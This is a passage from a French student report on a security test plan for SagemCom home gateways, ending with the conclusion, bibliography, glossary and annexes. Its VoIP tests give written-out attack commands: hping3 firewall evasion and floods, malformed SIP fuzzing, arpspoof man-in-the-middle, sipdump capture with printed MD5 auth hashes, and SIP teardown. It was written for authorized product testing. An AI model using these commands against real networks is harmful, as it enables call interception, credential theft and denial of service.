Dans la deuxime manipulation, nous avons utilis une technique pour contourner la scurit du pare-feu. Nous avons envoy les paquets partir du port source 5060. (Voir chapitre 3 : 4.3 SIP)
hping3 S p 5060 -k i u10 @WAN hping3 -udp p 5060 -k i u10 @WAN

Page 78

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

-k : port source est le mme que le port destination.

Test18: Requtes SIP malformes


Le but de ce test est de tester si le serveur VoIP implment sur le TR supporte les requtes SIP malforms. Pour cela, nous avons utilis loutil PROTOS Test-Suite: c07-sip . Avec BackTrack, sous le dossier /penstest/VoIP/protos-sip , nous lanons la commande suivante :
java -jar c07-sip-r2.jar -touri USER@<@WAN> -showsent Sending Test-Case #5 test-case #5, 504 00000000 61 61 61 61 00000016 61 61 61 61 00000032 61 61 61 61 00000048 61 61 61 61 00000064 61 20 73 69 00000080 31 2e 31 20 00000096 3a 20 53 49 00000112 2e 66 6f 6f 00000128 61 6e 63 68 .

bytes 61 61 61 61 61 61 61 61 70 3a 53 49 50 2f 2e 6f 3d 7a

61 61 61 61 31 50 32 72 39

61 61 61 61 31 2f 2e 67 68

61 61 61 61 31 32 30 3a 47

61 61 61 61 40 2e 2f 35 34

61 61 61 61 31 30 55 30 62

61 61 61 61 30 0d 44 36 4b

61 61 61 61 2e 0a 50 30 30

61 61 61 61 31 56 20 3b 30

61 61 61 61 39 69 62 62 30

61 61 61 61 2e 61 74 72 30

aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa a sip:111@10.19. 1.1 SIP/2.0..Via : SIP/2.0/UDP bt .foo.org:5060;br anch=z9hG4bK0000

Requte SIP malform.

5.2.2. Vole de session

Il existe plusieurs attaques bases sur le vole de session (ou HIjacking) dans les communications SIP. Ces attaques sont bases sur lattaque MITM qui permet un hacker de faire passer tous le trafic entre 2 machines par son PC. Nous doit dabord raliser lattaque ARP Poisonning.

Test19 : ARP Spoofing


Arpspoof <@IP Victim> <@IP TR> Arpspoof <@IP TR> <@IP Victim>

Avec wireshark, nous capture le trafic pour dterminer les paramtres de connexion SIP entre le TR et la victime.

Figure 40 Capture de messages de signalisation (SIP)

Page 79

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Test20 : Capture de lauthentification SIP


Avec loutil SIPDUMP , nous pouvons capturer les authentifications SIP.
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------* Using dev 'eth0' for sniffing * Starting to sniff with packet filter 'tcp or udp or vlan' * Dumped login from 192.168.1.104 -> 192.168.1.1 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.1 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.1 (User: '200')

Ces informations seront utiles pour des ventuelles attaques bases sur lID dun autre utilisateur.
192.168.1.1"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549 294f6535070439fb069c968 192.168.1.1"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc75159 36a667565228dbaa0293dfc 192.168.1.1"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae 07ed8391212119aab36f108

Test21: TearDown attack


Cette attaque a t ralise en utilisant loutil teardown afin de terminer une communication active entre deux entits en envoyant une requte BYE avec lID spoof. La ralisation de cette attaque il faut capturer une rponse OK valide. La commande utilise est la suivant :
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

Conclusion
Dans ce chapitre, nous avons dcrit les diffrents tests mis en uvre pour la ralisation dun plan de test de scurit pour les TRs SagemCom. Lapproche modulaire nous a permis de dmultiplier les possibilits de scnario de tests et dutiliser des notions issues dun module sur dautres. Dans notre effort, nous avons essay de couvrir la totalit des failles et risques possibles pour chaque module. Nanmoins limagination et lvolution du monde du piratage est sans limites et il reste certainement plusieurs autres tests possibles imaginer afin que nous puissions assurer la scurit totale dans le cadre des tests de pntration et contre carrer les intention malveillantes ou les failles induites par larchitecture mme de certains services et leur interactions. Lensemble des tests a t intgr sous Test Link30 sous forme dun plan de tests. (Voir Annexe 1 et Annexe 2)

30

Test Link est un outil de gestion des tests.

Page 80

Conclusion et Perspectives

ans le cadre de ce projet nous avons contribu la mise en place dune plateforme ainsi quun plan de test de scurit pour les terminaux rsidentiels pour le compte de lentreprise

SagemCom. Ce travail a commenc par une tude sur les diffrents modules du TR et les risques auxquels ils sont exposs. Par la suite une tude comparative entre les diffrents outils existants a t ralise. Cette tude nous a permis davoir une vision globale sur les besoins en termes de scurit pour les tests faire traits par priorit. A lissue de cette tude, nous avons opt, dune part, la mise en place dune plateforme de test qui couvre les diffrents modules du TR, bas sur des produits libres et dautre part la dfinition dun plan de test correspondant droul sur diffrents produits SagemCom. Ce projet nous a permis de traiter un sujet dactualit dans le domaine de la scurit informatique. Il faut dire que la scurit des TRs est un point trs important car il prsente le lien entre le rseau local dune entreprise ou des particuliers et lInternet. Tout au le long de ce projet, nous avons essay de respecter les priorits de quelques tests par rapport dautres. Plusieurs extensions et amliorations peuvent tre envisages pour finaliser ce travail, savoir : Lautomatisation des tests pour gagner en temps dexcution et de minimiser le besoin en ressources humaines pour passer les tests. Lautomatisation permettra en plus de dtecter rapidement les rgressions entre les diffrentes versions logicielles dune passerelle. La force de frappe des quipes validation nen sera que renforce. Le dveloppement des scripts avec l'outil dautomatisation utilis par SagemCom seront ventuellement envisags. Le dveloppement dun outil de test des attaques DOS propre aux besoins de SagemCom qui consiste tester seulement les services spcifiques proposs par les TRs Sagemcom La mise en place doutils de tests de scurit des TRs intgrant le protocole IPv6 qui est une nouvelle exigence demande par les clients de SagemCom.

Page 81

Bibliographie

1.

Ilacqua,

Spike.

The

first

ISP.

USENIX.

[Online]

Mars

15,

1999.

http://www.usenix.org/publications/login/1999-2/isp.html. 2. Le Nouvel Observateur. La naissance du Web . Le nouvelle observateur. [En ligne] 20 Avril 2009. http://tempsreel.nouvelobs.com/vu-sur-le-web/20090420.OBS4013/la-naissance-du-web.html. 3. Le Journal du NET. Nombre d'abonns Internet en France. Le journal du NET. [En ligne] 18 Octobre 2010. http://www.journaldunet.com/ebusiness/le-net/nombre-abonnes-internet-france.shtml. 4. Lalonde, Denis. Les attaques informatiques grimpent en nombre, mais font moins de dommages. Direction Informatique. [En ligne] 20 Avril 2011.

http://www.directioninformatique.com/DI/client/fr/DirectionInformatique/Nouvelles.asp?id=62205. 5. SagemCom. BU Terminaux rsidentiels & Haut Dbit . SagemCom. [En ligne] 2010. www.sagemcom.com/index.php?id=1797&L=1. 6. Beaver, Kevin. Hacking For Dummies, 3rd Edition. s.l. : Wiley Publishing, Inc., 2011. 7. ISECOM. OSSTMM 3. The Institute for Security and Open Methodologies (ISECOM). [En ligne] 14 Dcembre 2010. http://www.osstmm.org/. 8. OWASP, The Open Web Application Security Project. OWASP, The Open Web Application Security Project. [En ligne] 12 Aout 2007. https://www.owasp.org/. 9. PTES. PTES, the Penetration Testing Execution Standard. PTES, the Penetration Testing Execution Standard. [En ligne] Janvier 2011. http://www.pentest-standard.org. 10. Katterjohn, Kris. Port Scanning Techniques. Packet Storm. [En ligne] 03 Aout 2007. http://packetstormsecurity.org/files/view/54973/port-scanning-techniques.txt. 11. DAMAYE, Sbastien. Attaques/Enumeration-Scanning/Scan-ports . Aldeid.com. [En ligne] 19 September 2010. http://www.aldeid.com/wiki/Attaques/Enumeration-Scanning/Scan-ports. 12. Nmap. Technique de scan de ports. Nmap.ORG. [En ligne] 2007. http://nmap.org/man/fr/manport-scanning-techniques.html. 13. Nmap. Timing and Performance. Nmap.ORG. [En ligne] 2007. http://nmap.org/book/manperformance.html.

Page 82

Bibliographie
14. Nmap. Remote OS detection via TCP/IP Stack FingerPrinting. Nmap.ORG. [En ligne] 18 Octobre 1998. http://nmap.org/nmap-fingerprinting-article.txt. 15. PCI Security Standards Council. PCI SSC Data Security Standards Overview. PCI Security Standards Council. [En ligne] 2006. https://www.pcisecuritystandards.org/security_standards/. 16. Adam Doupe, Marco Cova et Giovanni Vigna. An Analysis of Black-box Web Vulnerability Scanners. s.l. : University of California, 2010. 17. Hemel, Armijn. UPnP IGD profile. IPnP Hacks. [En ligne] 2006. http://www.upnp-hacks.org/. 18. Lehembre, Guillaume. Wi-Fi security WEP, WPA. s.l. : hakin9, 2010. 19. the VOIP Wiki. the VOIP Wiki. the VOIP Wiki. [En ligne] Mai 2011. http://www.voip-info.org/. 20. Services VoIP. Perspectives VoIP. Voip Zlites. [En ligne] 2011. http://www.services-voip.fr. 21. Collier, Mark. Basic Vulnerability Issues for SIP Security. s.l. : SecureLogix Corporation, 2005. 22. Back|Track Linux. Back|Track Linux: Penetration Testing Distribution. Back|Track Linux: Penetration Testing Distribution. [En ligne] 2011. http://www.backtrack-linux.org/. 23. OWASP Foundation. OWASP TESTING GUIDE V3.0. 2008. 24. Design and Analysis of Communication Systems Group (DACS). Attacks by Anonymous WikiLeaks Proponentsnot Anonymous. 2010. 25. CVE Details. Unspecified vulnerability in ISC BIND 9.0.x. CVE Details. [En ligne] 12 Octobre 2010. http://www.cvedetails.com/cve/CVE-2010-0290/. 26. CERT. CERT Advisory CA-1998-01 Smurf IP Denial-of-Service Attacks. CERT. [En ligne] 5 Janvier 1998. http://www.cert.org/advisories/CA-1998-01.html. 27. CERT. CERT Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks. CERT. [En ligne] 19 Septembre 1996. www.cert.org/advisories/CA-1996-21.html. 28. CERT. CERT Advisory CA-1997-28 IP Denial-of-Service Attacks. CERT. [En ligne] 17 Dcembre 1997. http://www.cert.org/advisories/CA-1997-28.html. 29. Open Source Vulnerability Data Base. 5941: Linux Kernel Zero Length IP Fragmentation DoS. Open Source Vulnerability Data Base. [En ligne] 24 Mars 1999. http://osvdb.org/show/osvdb/5941.

Page 83

Bibliographie
30. Open Source Vulnerability Date Base. 5729: Multiple Vendor TCP/IP Fragmentation DoS (nestea). Open Source Vulnerability Date Base. [En ligne] 16 Avril 1998.

http://osvdb.org/show/osvdb/5729. 31. Open Source Vulnerability Data Base. 5394: Linux Kernel Fragmented ICMP Packet Information Disclosure. Open Source Vulnerability Data Base. [En ligne] 8 Avril 2004. http://osvdb.org/show/osvdb/5394. 32. . 4566: Linux Kernel TCP/IP Fragment Reassembly DoS. Open Source Vulnerability Data Base. [En ligne] 28 Mai 2003. http://osvdb.org/show/osvdb/4566. 33. . 1666: Multiple Vendor Out Of Band Data DoS (WinNuke). Open Source Vulnerability Data Base. [En ligne] 7 Mai 1997. http://osvdb.org/show/osvdb/1666. 34. OSVDB. Multiple Vendor Oversized ICMP Ping Packet DoS . Open Source Vulnerability Data Base. [En ligne] 01 Janvier 1997. http://osvdb.org/11454. 35. Open Source Vulnerability Data Base. 5727 : Multiple Vendor IP Fragment Re-Assembly Remote DoS (teardrop) . Open Source Vulnerability Data Base. [En ligne] Novembre 1997. http://osvdb.org/show/osvdb/5727.

Page 84

Glossaire

ADSL: Asymmetric Digital Subscriber Line Ajax: Asynchronous Javascript and XML

CVE: Common Vulnerability and Exposures CCMP: Counter-Mode/CBC-Mac protocol CMS: Content Management System C&C: Command and Control Server

DHCP: Dynamic Host Configuration Protocol DNS: Domain Name System DynDns: Dynamic DNS DLNA: Digital Living Network Alliance DMZ: Zone Dmilitarise DoS: Denial Of Service DDOS: Distributed Denial Of Service DECT: Digital Enhanced Cordless Telecommunications

ELSEC: Electronics Security EMSEC: Emission Security

FAI: Fournisseur dAccs Internet FTTH: Fiber To The Home FTP: File Transfer Protocol

GUI: Graphical User Interface

Page 85

Glossaire

HTTP: Hypertext Transfer Protocol HTTPS: Hypertext Transfer Protocol Secured

IP: Internet Protocol ICMP: Internet Control Message Protocol IMAP: Internet Message Access Protocol IHM: Interaction Humain Machine IGD: Internet Gateway Device IRC: Internet Relay Chat IEEE: Institute of Electrical and Electronics Engineers

LAN: Local Area Network

M2M: Machine To Machine MAC: Media Access Control MGCP: Media Gateway Control Protocol

NAT: Network Address Translation NVD: National Vulnerability Database NVTs: Network Vulnerability Tests

OSI: Open Systems Interconnection OSVDB: Open Source Vulnerability Data Base OWASP: Open Web Application Security Project OpenVas: Open Vulnerability Assesement System OSSTMM: Open Source Security Testing Methodology Manual OSCP: Offensive Security Certified Professional OSCE: Offensive Security Certified Expert OSWP: Offensive Security Wireless Professional

PTES: Penetration Testing Execution Standard PCI DSS: Payment Card Industry Data Security Standard

Page 86

Glossaire
POP3: Post Office Protocol 3

RNIS : Rseau Numrique Intgration de Services

SMTP: Simple Mail Transfer Protocol SSH: Secure Shell SIP: Session Initiation Protocol SSL: Secure Sockets Layer SaaS: Software as a Service SSID: Service Set Identifier SIGSEC: Signal Security PHYSSEC: Physical Security SPECSEC: Spectrum Security COMSEC: Communications Security

TR : terminal rsidentiel TCP: Transmission Control Protocol TKIP: Temporal Key Integrity Protocol TLS: Transport Layer Security

UPnP: Universal Plug and Play UDP: User Datagram Protocol US-CERT: United State - Community Emergency Response Teams

VoIP: Voice over IP VDSL: Very high bit-rate DSL VOD: Video on Demand

WAN: Wide Area Network WiFi: Wireless Fidelity WEP: Wired Equivalent Privacy WPA: WiFi Protected Access WPA-PSK: WiFi Protected Access Pre-shared key

Page 87

Annexes

Module

Test

Rfrence RES-SCAN-TE1:TCP-SCAN RES-SCAN-TE1:SYN-SCAN RES-SCAN-TE1:UDP-SCAN RES-SCAN-TE1:EVASION-TECH RES-SCAN-TE2 RES-SCAN-TE3 RES-VULN-TE1 RES-VULN-TE2 RES-VULN-TE3 RES-VULN-TE4 RES-VULN-TE5 RES-DOS-TE1:LOIC-TCP RES-DOS-TE1:LOIC-UDP RES-DOS-TE1:LOIC-HTTP RES-DOS-TE2:HPING-SYN

Test1 : scan des ports

Test2 : scan des services Test3 : dtection dOS Test4: fuzzing avec OWASP-ZAP Test5: owasp-cm-001 SSL/TLS Rseau Test6: owasp-cm-008 Mthodes HTTP supports Test7: owasp-at-004 numrer les utilisateurs Test8: owasp-at-004 brute force attack Test9 (TCP/UDP/HTTP Flood)

Test10 (SYN/UDP/ICMP Flood) Test11 : Dns cache poisoning Test12: Attaque Ping Of Death UPnP Test13 : ajout dune rgle portmap invalide Test14: injection du code Test15 : Craquage des cls de chiffrement Test16: Perturbation des connexions Test17: SYN/UDP Flood (SIP) VoIP Test18: Requtes SIP malformes Test19 : ARP Spoofing Test20 : Capture de lauthentification SIP Test21: TearDown attack:
Tableau 10 Liste des tests

RES-DOS-TE2:HPING-UDP RES-DOS-TE2:HPING-ICMP RES-DIV-TE1 RES-DIV-TE2 UPNP-TE1 UPNP-TE2:BLACK-BOX UPNP-TE2:WHITE-BOX WIFI-TE1 WIFI-TE2 SIP-TE1 SIP-TE2 SIP-TE3 SIP-TE4 SIP-TE5

WIFI

Page 88

Annexes

Page 89

Annexes

#!/bin/bash # spawn # Exploit-db script update - 03/31/2011 - 16:39 local=$(cat revision) remote=$(curl --silent --head http://www.exploit-db.com/archive.tar.bz2 | grep "LastModified" | md5sum | cut -f1 -d' ') echo "Checking http://www.exploit-db.com for newest version" if [ "$local" == "$remote" ]; then echo "No updates available" else echo "New update available, Downloading . . ." ; mv archive.tar.bz2 archive-old.tar.bz2 ; wget http://www.exploit-db.com/archive.tar.bz2; tar jxf archive.tar.bz2 ; echo "$remote" > revision echo "Exploits are updated" fi

Page 90

Annexes

msf msf msf [*] msf [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*]

> db_driver postgresql > db_connect postgres:metasploit@127.0.0.1/metasploit > db_status postgresql connected to metasploit > db_import 192.168_scan.xml Importing 'Nmap XML' data Import: Parsing with 'Nokogiri v1.4.3.1' Importing host 192.168.1.1 Importing host 192.168.1.2 Importing host 192.168.1.3 Importing host 192.168.1.4 Importing host 192.168.1.7 Importing host 192.168.1.9 Importing host 192.168.1.10 Importing host 192.168.1.13 Importing host 192.168.1.15 Importing host 192.168.1.16 Importing host 192.168.1.22 Importing host 192.168.1.100 Successfully imported /home/mark/192.168_scan.xml

Page 91

Annexes

msf > load nessus [*] Nessus Bridge for Nessus 4.2.x [+] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus msf > nessus_policy_list [+] Nessus Policy List ID Name Comments -- -----------4 Internal Network Scan -3 Web App Tests -2 Prepare for PCI DSS audits -1 External Network Scan 1 Customized Internel Network Scan msf > nessus_scan_new 1 ScanTR 192.168.1.1 [*] Creating scan from policy number 1, called "ScanTR" and scanning 192.168.1.1 [*] Scan started. uid is c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 msf > nessus_scan_status [+] Running Scans Scan ID Name Owner Started Status Current Hosts Total Hosts -------------- ------------------------ ----------c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 win2008-msf msf 03:48 Jun 01 2011 running 0 1 *Snip* msf > nessus_report_list [+] Nessus Report List ID Name Status Date ------------c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 win2008-msf completed 03:51 Jun 01 2011 *Snip* msf > nessus_report_get c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 [*] importing c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 [*] 192.168.1.180 Microsoft Windows Server 2008 Service Pack 1 Done! [+] Done msf > hosts -c address,vulns Hosts ===== address ------192.168.1.161 vulns ----33 port=3389 proto=tcp name=NSSport=1900 proto=udp name=NSSport=1030 proto=tcp name=NSSport=445 proto=tcp name=NSSport=445 proto=tcp name=NSSport=445 proto=tcp name=NSSport=445 proto=tcp name=NSSport=445 proto=tcp name=NSSport=445 proto=tcp name=NSS-

msf > vulns [*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 10940 refs= [*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 35713 refs= [*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 22319 refs= [*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 10396 refs= [*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 10860 refs=CVE-2000-1200,BID-959,OSVDB-714 [*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 10859 refs=CVE-2000-1200,BID-959,OSVDB-715 [*] Time: 2010-09-28 01:51:39 UTC Vuln: host=192.168.1.161 18502 refs=CVE-2005-1206,BID-13942,IAVA-2005-t-0019 [*] Time: 2010-09-28 01:51:40 UTC Vuln: host=192.168.1.161 20928 refs=CVE-2006-0013,BID-16636,OSVDB-23134 [*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161 35362 refs=CVE-2008-4834,BID-31179,OSVDB-48153 [*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161

Page 92